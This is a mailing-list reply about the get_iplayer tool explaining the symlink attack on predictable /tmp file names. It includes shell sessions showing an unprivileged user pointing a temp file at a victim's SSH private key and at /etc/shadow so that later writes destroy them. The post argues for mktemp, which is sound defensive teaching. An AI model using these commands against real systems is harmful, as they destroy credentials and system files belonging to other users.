On 2013-08-02 09:26, Paul Verrall wrote:
However, as get_iplayer's output does not contain any sensitive info,
and more importantly the output is not read back into a process,
we're
probably safe in this instance, probably.
No, you've missed the point.
Bad:
$ whoami
evilgenius
$ ln -s /home/victim/.ssh/id_rsa /tmp/mydangeroustempfile
$ whoami
victim
$ echo "you lose" > /tmp/mydangeroustempfile
$ cat ~/.ssh/id_rsa
you lose
If victim didn't back up his keys, he's SOL. evilgenius does not need
to be a privileged user to carry out this attack.
Worse:
$ whoami
evilgenius
$ ln -s /etc/shadow /tmp/myworsetempfile
$ su -
# whoami
root
# get_iplayer --refresh > /tmp/myworsetempfile
# cat /etc/shadow
get_iplayer v2.83, Copyright (C) 2008-2010 Phil Lewis
This program comes with ABSOLUTELY NO WARRANTY; for details use
--warranty.
This is free software, and you are welcome to redistribute it under
certain
conditions; use --conditions for details.
<etc>
The only safe way to deal with this is mktemp(1) (and don't run
get_iplayer as root, though I hope that goes without saying).
--
Jonathan Wiltshire j...@debian.org
Debian Developer http://people.debian.org/~jmw
4096R: 0xD3524C51 / 0A55 B7C5 1223 3942 86EC 74C3 5394 479D D352 4C51
<directhex> i have six years of solaris sysadmin experience, from
8->10. i am well qualified to say it is made from bonghits
layered on top of bonghits
_______________________________________________
get_iplayer mailing list
get_iplayer@lists.infradead.org
http://lists.infradead.org/mailman/listinfo/get_iplayer
